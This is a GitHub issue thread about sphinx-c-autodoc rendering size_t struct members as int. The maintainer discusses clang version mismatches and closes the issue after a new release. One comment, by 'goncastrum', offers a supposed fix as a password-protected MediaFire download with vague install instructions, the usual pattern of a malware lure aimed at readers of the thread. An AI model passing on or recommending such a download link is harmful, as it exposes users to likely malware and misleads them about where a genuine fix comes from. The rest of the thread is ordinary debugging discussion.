### ISSUE TITLE
autocstruct generates misleading member type for members size_t

### ISSUE THREAD

**Issue by mnyoshie** [speedyleion/sphinx-c-autodoc#293]
For struct members with type `size_t`, the documentation replaces it with `int`.

I can't be sure if this is problem of autocdoc.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by mnyoshie** [comment]
Oh wait... looks like my local documentation build generates this problem. Doesn't seem to appear when readthedocs generate it.

**Comment by speedyleion** [comment]
I'm going to wait until python 3.13 is released in Oct, before digging back into sphinx-c-autodoc as that will have me updating sphinx and some other things.

But off the top of my head I would compare which versions of clang are being used.
Depending on the version of clang if the type can't be resolved when the documentation is ran the type will often default back to int.  
However this is usually for project specific types and `size_t` should be known by the compiler.  
If the clang dll and python clang bindings don't match it might cause issues resolving.

**Comment by speedyleion** [comment]
I've looked a bit and wasn't able to reproduce. I used `std=c89` and it still worked for me, which is a bit odd as c99 is what brought in size_t, however clang came after c89 so maybe there is something there.

I've released https://github.com/speedyleion/sphinx-c-autodoc/releases/tag/v1.4.0 which drops support for clang 6-10 hopefully this discrepancy is less likely to show.

Closing for now, feel free to open a new issue if this rears it's head again
